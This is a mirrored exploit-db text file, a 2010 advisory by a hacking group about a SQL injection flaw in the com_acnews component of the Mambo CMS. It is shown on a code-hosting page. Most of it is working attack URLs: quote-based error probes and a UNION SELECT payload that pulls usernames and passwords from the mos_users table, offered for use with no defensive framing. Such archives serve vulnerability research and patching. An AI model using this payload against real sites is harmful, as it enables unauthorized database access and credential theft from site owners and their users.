bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/11474.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

30 lines
No EOL
912 B
Text
Raw Blame History

Mambo Component com_acnews [id] | SQL Injection
Author: Zero Bits & Xzit3
Team: Ro0T-MaFia
Member's: Zero Bits, CMD, Jeferx, Xzit3, XP3RM4 & Jeferx
Date: 15/02/2010
Contact: Zer_Bits@GobiernoFederal.com - wscalle1@e-r00t.org
Country: Venezuela - Mexico
############################
Vulnerability's:
[+] SQL Injection:
Error: You have an error in your SQL syntax.
BUG: index.php?lang=en&option=com_acnews&task=view&id=188(SQLi)
Real example:
http://server/index.php?lang=en&option=com_acnews&task=view&id=-188'&Itemid=136&page=0 (Web Vuln.)
http://server/index.php?lang=en&option=com_acnews&task=view&id=331%27&page=0
http://server/index.php?option=com_acnews&page=1&Itemid=-1+UNION+SELECT+1,2,concat%28username,0x20,password%29,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20mos_users--
###########################
Visit:
Ilegalintrusion.NET | Seguridadblanca.ORG | Diosdelared.COM | Remoteexecution.ORG
Reference in a new issue View git blame Copy permalink